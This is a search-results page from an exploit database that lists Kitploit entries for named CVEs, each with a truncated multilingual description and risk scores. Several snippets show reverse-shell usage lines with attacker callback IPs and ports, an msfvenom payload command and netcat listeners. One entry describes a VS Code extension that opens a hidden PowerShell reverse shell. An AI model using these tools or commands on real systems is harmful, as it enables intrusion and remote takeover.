Lucene search
+L

2528 matches found

Kitploit
Kitploit
added 2026/09/08 4:30 a.m.7 views

CVE-2022-22947

CVE-2022-22947 CVE-2022-22947EXP,CVE-2022-22947RCE Usage Reverse Shell python3 CVE-2022-22947.py 目标网址 弹shell的IP 端口 Execute Command python3 CVE-2022-22947.py 目标网址 命令...

10CVSS7.8AI score0.98253EPSS
SaveExploits54
Kitploit
Kitploit
added 2026/09/08 4:22 a.m.4 views

langflow-rce-exploit

Langflow RCE Exploit CVE-2025-3248 Remote Code Execution Exploit for Langflow CVE-2025-3248 Features Automatic vulnerability detection Multiple exploitation modes: Interactive shell Single command execution Reverse shell connection File upload capability Colorized user interface Multiple reverse...

9.8CVSS8.5AI score0.99989EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/08 2:44 a.m.6 views

bassmaster-rce

bassmaster-rce 通过注入任意 JavaScript 来利用 CVE-2014-7205,从而实现远程代码执行(Remote Code Execution)。 我偶然发现了 LuuPhu 的这篇文章(用越南语撰写)。既然我写过一些 NodeJS 代码,却从未尝试过对其进行漏洞利用,我想何不今天就试试呢? Python PoC 包含两种反弹 Shell: 1. 一个简单的 NC 反弹 Shell 2. 一个"简单"的 NodeJS 反弹 Shell,取自 Riyaz Walikar 的 ibreak.software 免责声明 为求内容完整:...

10CVSS8.2AI score0.78582EPSS
SaveExploits6References1
Kitploit
Kitploit
added 2026/09/08 2:42 a.m.8 views

CVE-2025-55319-PoC

Reference: CVE-2025-55319 针对 HTB "Checkpoint" 挑战的 VS Code .vsix 扩展概念验证。 安装后,扩展自动激活并产生一个隐藏的 PowerShell 反向 shell 回连到攻击者。 ⚠️ 仅限授权使用。 这是一个 CTF/实验室环境产物。仅可部署在你拥有或明确授权测试(例如 HTB 目标机)的机器上。 工作原理 extension/package.json — 扩展清单。"activationEvents": "" 使它在 VS Code 加载时即刻运行,无需用户交互。 extension/extension.js — 在...

9.8CVSS7.9AI score0.00918EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/08 1:59 a.m.8 views

CVE-2018-3191-Rce-Exploit

CVE-2018-3191-Rce-Exploit 作者:Break 第一步:java -jar GenPayload.java output SJpayload.bin,地址为RMI服务器地址 第二步:java -jar RMISERVER.jar httpaddress,RMI服务器监听端口1099并在Web服务器上加载远程反向类 第三步:将两个文件(反向shell) LoadObject.class 和 StreamConnection.class 放在HTTP服务器上,并能通过URL访问 第四步:nc -llp 2222 第五步:python weblogic.py...

9.8CVSS8.2AI score0.63188EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/08 1:13 a.m.12 views

CVE-2018-8174-exp

CVE-2018-8174EXP usage: CVE-2018-8174.py -h -u URL -o OUTPUT -i IP -p PORT Exploit for CVE-2018-8174 可选参数: -h, --help 显示此帮助信息并退出 -u URL, --url URL exp URL -o OUTPUT, --output OUTPUT 输出的漏洞利用RTF文件 -i IP, --ip IP netcat的IP -p PORT, --port PORT netcat的端口 示例: 1. python CVE-2018-8174.py -u...

7.6CVSS7AI score0.88508EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/08 12:52 a.m.5 views

CVE-2025-27591

CVE-2025-27591 introduction below versions v0.9.0 are vulnerable to a local privilege escalation vulnerability duo to the fact that the program creates a world-writable log file, an a world writable log file instead, the attacker can replace the log file with a symblink to any system-critical fil...

6.8CVSS7.2AI score0.00364EPSS
SaveExploits23References3
Kitploit
Kitploit
added 2026/09/07 11:48 p.m.6 views

CVE-2025-5548

🐞CVE-2025-5548 FreeFloat FTP Server 1.0 中的缓冲区溢出 🎯 栈缓冲区溢出利用 本仓库包含一个网络安全项目的文档和实际开发过程,该项目专注于在 32 位 Windows 环境中进行逆向工程和内存级漏洞(栈缓冲区溢出)的利用。 📌 项目目标 本项目的目标是审计、分析并成功利用 Freefloat FTP Server v1.00 软件,该软件已知缺乏现代安全缓解措施(如 ASLR 或 DEP)。本仓库记录了攻击的完整生命周期:从使用专业工具搭建实验室环境,到漏洞发现(模糊测试),再到劫持程序执行流程以获得远程控制台(反向 Shell)。 📂 仓库结构...

9.8CVSS6AI score0.14985EPSS
SaveExploits14References2
Kitploit
Kitploit
added 2026/09/07 7:31 p.m.4 views

oracleShell

oracleShell ejecución de comandos en base de datos Oracle Entorno de prueba - privilegios DBA: SELECT FROM v$version root@kitploit: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production PL/SQL Release 11.2.0.1.0 - Production "CORE 11.2.0.1.0 Production" TNS for 32-bit Windows:...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/07 7:13 p.m.7 views

CVE-2022-41343

CVE-2022-41343 🐍 CVE-2022-41343的Python利用 用于dompdf 2.0.1的分阶段反向Shell 基于:Positive Sec的文章 和 PoC 示例 root@kitploit: cve-2022-41343 10.10.16.3 44444 用法 root@kitploit: usage: cve-2022-41343 -h -l SERVERPORT -s SHELL -n FONTNAME ip port positional arguments: ip Shell回调IP地址/主机 port Shell回调端口 options: -h,...

7.5CVSS7.7AI score0.04672EPSS
SaveExploits3References2
Kitploit
Kitploit
added 2026/09/07 7:13 p.m.8 views

CVE-2022-0944

CVE-2022-0944 针对 SQLPad RCE(CVE-2022-0944) 的概念验证漏洞利用程序 用法 root@kitploit: usage: main.py -h url lhost lport username password positional arguments: url URL to SQLPad lhost Listener host address for reverse shell lport Listener port for reverse shell username login username optional password login...

9.1CVSS7.9AI score0.08669EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/07 6:52 p.m.6 views

cve-2025-57819-exploit

CVE-2025-57819 漏洞利用工具 元数据 严重性: 严重 9.8 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 类型: 未认证 SQL注入 → 远程代码执行 受影响的软件: FreePBX endpoint 模块 参数 : 目标主机名或 IP 地址(存在漏洞的 FreePBX 实例) : 攻击者用于接收反向 Shell 回调的 IP 地址 : 监听传入连接的端口 示例: root@kitploit: python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999 监听器设置...

10CVSS8.5AI score0.85463EPSS
SaveExploits30References2
Kitploit
Kitploit
added 2026/09/07 6:50 p.m.6 views

CVE-2019-15107

CVE-2019-15107 Webmin 1.890 未认证远程代码执行漏洞 该脚本用于利用 Webmin 1.890 中的未认证命令执行漏洞。它允许您在目标 Webmin 服务器上执行任意命令或获取反向 Shell。 使用方法 该漏洞利用工具需要 5 个参数: root@kitploit: $ python3 test.py -h usage: test.py -h -i IP Address -p Port number -c Command --shell -x Exploit unauthenticated command execution in Webmin 1.890...

10CVSS8.8AI score0.99766EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/09/07 5:49 p.m.6 views

CVE-2019-0232

Apache Tomcat CVE-2019-0232 漏洞利用工具 此脚本利用 Apache Tomcat 中的 CVE-2019-0232 漏洞,该漏洞由于对 ism.bat 脚本处理不当,可导致远程代码执行。脚本借助 certutil 和 nc.exe(Netcat)的反向 shell 技术,获取对易受攻击系统的远程访问权限。 漏洞概述: CVE ID :CVE-2019-0232 受影响产品 :Apache Tomcat 6.x、7.x、8.x 和 9.x 描述 : CVE-2019-0232 是 Apache Tomcat 处理 ism.bat...

9.3CVSS7.8AI score0.99652EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/07 5:49 p.m.11 views

PCmanBoF

PCman FTP服务器缓冲区溢出与远程代码执行 CVE-2013-4730 一个利用CVE-2013-4730针对PCman FTP服务器v2.0.7的简单缓冲区溢出攻击 工作原理? 这个简单的BoF覆盖缓冲区并执行shellcode,从而建立反向连接(反向shell) 漏洞机器: WindowsXP SP3运行PCman FTP服务器2.0.7版本 启动 $ python3 PCman.py 将shellcode替换为你自己的! $ sudo ./msfvenom windows/shellreversetcp LHOST= LPORT=4444 启动netcat $ ncat -l...

10CVSS5.9AI score0.66462EPSS
SaveExploits17
Kitploit
Kitploit
added 2026/09/07 5:34 p.m.7 views

APT-Backpack

APT-Backpack Most common used CVE's by APT, legitimate RAT and other tools used by adversary CVE's CVE-2019-11510 Pulse Connect Secure 8.2 8.3 9.0 Unauth file read CVE-2019-19781 Citrix ADC & Gateway Directory Traversal CVE-2020-5902 F5 Big IP RCE CVE-2021-1497 Cisco HyperFlex HX Unauth Command...

10CVSS7.4AI score0.99999EPSS
SaveExploits1031
Kitploit
Kitploit
added 2026/09/07 5:09 p.m.7 views

CVE-2020-8816

CVE-2020-8816 CVE-2020-8816を悪用するPythonスクリプトです。Pi-holeのリモートコード実行の脆弱性を利用します。 このスクリプトはFrançois Renaud-Philippon氏が発見した手法を用いて、Webインターフェースがバージョン4.3.3未満のPi-hole上でリモートコード実行を実現します。このエクスプロイトには、www-dataユーザーのパスが/opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binである必要があります。 root@kitploit:...

9.1CVSS8.1AI score0.7819EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/07 3:56 p.m.4 views

CVE-2024-25832-PoC

CVE-2024-25830 and CVE-2024-25832 - DataCube3 Improper Access Control and Unrestricted File Upload. Overview This repository features a Proof of Concept PoC for a two-step exploit chain targeting DataCube3 devices. It combines CVE-2024-25830 Improper Access Control to extract root passwords and...

9.8CVSS7.6AI score0.2403EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/07 3:44 p.m.9 views

cve-2015-1538-1

请不要与任何人分享此代码。该代码是在FrienNDA下提供给你的。违反此规定的人将不再被视为朋友。 随附的是一个Python脚本,用于生成利用“stsc”漏洞(即CVE-2015-1538 1)的MP4文件。这是我在Stagefright库中报告的最关键的漏洞之一。该漏洞的预期结果是获得媒体用户的反弹shell。正如我在Black Hat和DEF CON演讲中详细介绍的那样,该用户还具有对inet、audio、camera和mediadrm等多个组的访问权限。这些组允许攻击者远程拍照或监听麦克风,而无需利用其他漏洞。...

10CVSS6.1AI score0.99064EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/07 3:44 p.m.5 views

SMBGhost_AutomateExploitation

SMBGhost CVE-2020-0796 自動エクスプロイトと検出 このPythonプログラムは、RCE SMBGhost脆弱性のラッパーです。動作するエクスプロイトのクレジットはすべてchompie1337にあります。スキャナーのクレジットはioncodesにあります。 これらの機能を1つのプログラムに自動化しました。リバースシェルを作成する際には、Windowsターゲットのアーキテクチャを考慮する必要があります。 このエクスプロイトは安定していません 。自己責任で使用してください。最初はうまくいかないことがあるため、2回目のリトライを追加しました。...

10CVSS8.2AI score0.9981EPSS
SaveExploits126References3
Rows per page
Query Builder